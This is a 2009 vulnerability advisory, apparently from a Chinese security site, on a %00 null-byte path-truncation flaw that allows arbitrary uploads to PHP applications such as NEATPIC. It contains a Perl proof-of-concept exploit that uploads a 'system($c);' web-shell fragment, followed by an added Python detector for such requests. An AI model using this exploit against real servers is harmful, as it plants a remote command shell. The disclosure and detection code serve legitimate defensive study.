PHP web alert: \0 (null byte) filtering vulnerability in a variety of PHP applications

2009-09-17T00:00:00
ID MYHACK58:62200924680
Type myhack58
Reporter Anonymous
Modified 2009-09-17T00:00:00

Description

Vulnerability description:

When a PHP program lets the caller specify the PATH, appending %00 after the file name in that PATH makes it possible to upload any file.

Test program: NEATPIC PHP directory direct-reading version 1.2.3

http://web.cncode.com/SoftView.asp?SoftID=1820

Contributors to this document:

Vulnerability testing: Xiaolu, Lilo, SuperHei, Darkness [All BST Members]

Http://Www.Bugkidz.org

Xiaolu provided the following exploit program:

#!/usr/bin/perl
$| = 1;
use Socket;

$host = "127.0.0.1";
$port = "80";
$UploadTo = "";

# multipart/form-data body: a "path" field ending in %00, followed by the file part
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"path\"\r\n".
"\r\n".
"./php.php%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"image\"; filename=\"F:\\tools\\1.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
"system($c);\r\n".
"?>\r\n".
"-----------------------------7d41f4a600472--\r\n".
"\r\n";

print $str;
$len=length($str);
print $len;

# HTTP request carrying the body above
$req ="POST /index.php?action=upload HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://127.0.0.1/index.php?path=.\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
"Host: 127.0.0.1\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: PHPSESSID=111111111111111111111111\r\n".
"\r\n".
"$str\r\n\r\n";

print $req;
@res = sendraw($req);
print @res;

# Hmm... maybe you can send it another way
# sendraw: open a TCP connection to $host:$port, write the request, return the response lines
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
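
A defender-side check for the request shape described above, added here as an example and not part of the original advisory or of NEATPIC: it parses a multipart/form-data body and flags fields or file names carrying a NUL marker, plus image-named parts that lack image magic bytes. The function name, the extension list and the sample request are assumptions constructed for illustration.

```python
import email
import email.policy
import re

# NUL in raw, percent-encoded, or double-encoded form
NUL_RE = re.compile(rb"\x00|%00|%2500", re.I)
SCRIPT_EXT_RE = re.compile(rb"\.(php\d?|phtml|pl|cgi|asp|jsp)$", re.I)
IMAGE_MAGIC = {"gif": (b"GIF87a", b"GIF89a"), "png": (b"\x89PNG",), "jpg": (b"\xff\xd8\xff",)}

def inspect_upload(content_type, body):
    """Return a list of findings for one multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    if not msg.is_multipart():
        return ["body is not multipart"]
    findings = []
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        data = part.get_payload(decode=True) or b""
        if filename:  # file part: inspect the client-supplied file name
            checks = [(f"{name} filename", filename.encode("utf-8", "replace"))]
        else:         # plain field: inspect its value
            checks = [(name, data.strip())]
        for label, value in checks:
            m = NUL_RE.search(value)
            if m:
                findings.append(f"{label}: NUL marker")
                seen_by_fs = value[:m.start()]  # C file APIs stop at the NUL
                if SCRIPT_EXT_RE.search(seen_by_fs):
                    findings.append(f"{label}: truncates to a script name")
        if filename:
            magic = IMAGE_MAGIC.get(filename.rsplit(".", 1)[-1].lower())
            if magic and not data.startswith(magic):
                findings.append(f"{name}: {filename} lacks image magic bytes")
    return findings

# Constructed sample modelled on the request shape above; the file body is inert
BOUNDARY = "----constructed7d41f4a600472"
SAMPLE = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="path"\r\n\r\n'
    "./php.php%00\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="image"; filename="1.gif"\r\n'
    "Content-Type: text/plain\r\n\r\n"
    "not an image\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()
```

Calling `inspect_upload("multipart/form-data; boundary=" + BOUNDARY, SAMPLE)` returns three findings for the constructed request; the same logic belongs in the upload handler itself, which should reject the request rather than only log it.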